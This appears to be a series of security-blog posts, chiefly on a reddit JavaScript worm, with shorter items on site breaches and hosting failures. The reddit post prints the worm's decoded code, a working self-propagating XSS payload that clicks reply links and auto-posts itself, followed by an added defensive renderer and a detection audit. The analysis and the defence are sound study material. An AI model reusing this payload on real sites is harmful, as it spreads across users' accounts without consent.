Being an IT security enthusiast and knowing that most of the websites out there don’t take security seriously, I’m rarely surprised about big websites being compromised.
But this time I have been amazed, not because of a vulnerability, but because of the attention Grooveshark gives to its users: a security warning for users whose Adobe Flash is not up to date, shown every time you enter the website (screenshot in the original post).
Bravo. It’s an example I would expect others to follow as well.
P.S. they have a great error page when the service is down.
Today, while reddit was down for maintenance, people gathered on the #redditdowntime channel on freenode, where within a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
As I am writing this, a JavaScript worm is having fun spreading on reddit. On the one hand we should be happy it only spreads and does nothing else (you know, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
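The worm above propagates by posting a markdown link whose destination carries an onmouseover handler, so the interesting defensive question is what a comment renderer must do with link destinations. The following is an added example, not code from the original post and not reddit's own renderer or filter (which the post does not reproduce): a hypothetical link renderer that allowlists the destination scheme and entity-encodes every attribute value, plus a post-render audit that flags anchors carrying inline event handlers or script-scheme hrefs. The audit doubles as a regression test for the renderer and as a simple detection rule over stored comment HTML. All sample inputs are constructed for the example.

```javascript
// Added example, not part of the original post or of reddit's code base.
// Two defender-side pieces for the class of bug the worm above exploits:
//  1. renderLink(): a markdown-style link renderer that allowlists the
//     destination scheme and entity-encodes everything placed in an attribute,
//     so a destination such as "/onmouseover=eval(...)" can only ever be the
//     inert value of href, never a second attribute.
//  2. auditRenderedHtml(): a post-render check that flags anchors carrying
//     inline on* handlers or script-scheme hrefs, usable as a regression test
//     on the renderer or as a detection rule over stored comment HTML.
// All sample inputs below are constructed for the example.

function encodeAttr(value) {
  // The characters that can close or alter an HTML attribute or element.
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function safeHref(dest) {
  // Allow only site-relative paths and absolute http(s) URLs; reject
  // javascript:, data:, protocol-relative "//host" and anything containing
  // whitespace or quote characters (defense in depth on top of encodeAttr).
  const d = String(dest).trim();
  if (/[\s"'<>]/.test(d)) return null;
  if (d.startsWith("/") && !d.startsWith("//")) return d;
  if (/^https?:\/\/\S+$/i.test(d)) return d;
  return null;
}

function renderLink(text, dest) {
  const label = encodeAttr(text);
  const href = safeHref(dest);
  if (href === null) return label; // unsafe destination: keep the text, drop the link
  return `<a href="${encodeAttr(href)}">${label}</a>`;
}

function auditRenderedHtml(html) {
  // Returns one finding per suspicious <a ...> start tag.
  const findings = [];
  const anchorRe = /<a\b([^>]*)>/gi;
  let m;
  while ((m = anchorRe.exec(html)) !== null) {
    const attrs = m[1];
    if (/\son[a-z]+\s*=/i.test(attrs)) {
      findings.push({ reason: "inline event handler", tag: m[0] });
    }
    const hrefMatch = /\bhref\s*=\s*["']?([^"'\s>]*)/i.exec(attrs);
    if (hrefMatch && /^(javascript|data|vbscript):/i.test(hrefMatch[1])) {
      findings.push({ reason: "script-scheme href", tag: m[0] });
    }
  }
  return findings;
}

// Constructed destination in the spirit of the worm's link: it is accepted as a
// path but lands entirely inside the quoted href value.
const WORM_LIKE_DEST = "/onmouseover=eval(unescape(this.innerHTML))//";

// Constructed sample of what a broken renderer might have emitted.
const BROKEN_OUTPUT =
  '<a href="/" onmouseover="eval(1)">x</a><a href="javascript:alert(1)">y</a>';

function demo() {
  const safe = renderLink("x", WORM_LIKE_DEST);
  return {
    safe,                                              // inert anchor
    safeFindings: auditRenderedHtml(safe).length,      // 0
    brokenFindings: auditRenderedHtml(BROKEN_OUTPUT).length, // 2
    droppedJsLink: renderLink("x", "javascript:alert(1)"),   // "x"
  };
}

console.log(demo());
```

The audit is deliberately a regex over start tags, good enough for a test fixture or a coarse scan of stored comments; it does not decode entity-obfuscated schemes, so the renderer's allowlist, not the audit, is the control you rely on.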
While writing this article I tried to find the faulty filtering in reddit’s source code, but touching the code base for the first time I had no sense of direction. If someone would be kind enough to tell me in which file the code resides, I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: the worm author has happily shared his way of evading the filter.
UPDATE 2: there is a post about the bug on the reddit blog.
As some of you may have noticed, news about ImageShack being hacked started to circulate today. By the time I tried to see it for myself, part of the damage had been fixed; I say part because the ImageShack blog still throws database connection errors…
Even if this may have been worse for users who store their images there (myself included), there is more to it than meets the eye.
It looks as if my online existence was at the peak of doom this month…
First, my last hosting service was hacked and malicious iframes were injected into the website.
Later on, one of my Twitter accounts (I’ve got two) was suspended because I had a link to my infected blog.
The current hosting service I use had a hardware failure and a part of my blogs content is gone, RIP.
Apache failed to start a number of times this last week, and I’ve noticed this happens after cold reboots. Other web servers I tried did not fail in that respect, but weren’t able to populate PHP’s $_SERVER variables properly, so CodeIgniter wouldn’t work on them.
Actually I could have made CI work, but I want it to work OOTB (out of the box).
SFTP under CentOS/cPanel doesn’t officially support chroot (if you have set up a similar environment, feedback is welcome), so I could browse the root directory of my current hosting service and had access to more than 100 databases. The problem was fixed by disabling SFTP, and now I’m stuck with FTPES, which doesn’t support transfer resume… talk about responsive disclosure.
Posting this, doing a database backup and looking forward to more fail until the end of the month.
p.s. It must be due to my low karma on reddit.
littleboy10@insanesecurity.info
The hosting service had a massive breakdown and huge data loss, and I, in the usual tradition, hadn’t done any backups (lesson learned). Luckily I was able to recover a couple of articles from the Google cache.
So if you’re wondering, that was the reason why your feed filled with a bunch of Insane Security articles.
As you may have seen, in the last couple of days this blog was inactive, or being moved… All this happened due to a possible attack on my last hosting provider. I say possible because I can imagine multiple scenarios in which it could have happened.
That’s what many NoScript users have claimed to be doing after the recent debate about NoScript circumventing Adblock Plus to display the ads on its own page. One question I kept asking myself: are these really NoScript users?
For those of you who don’t use Twitter, I should specify that Twitter has long since moved away from the “what are you doing” principle and is today more of a base framework (the Twitter API) for many new (and innovative?) web applications.
Because of this direction that Twitter is (involuntarily) taking, dozens of web applications have sprung up, from URL shortening services to applications like WeFollow, TwitterSheep, TwitterTag, TwitVid, YFrog, TwitPic and many more…
…which will put a smile on your face. That is, if you are geeky/nerdy enough for them. Here are my test results. Click on one of the images to take the respective test.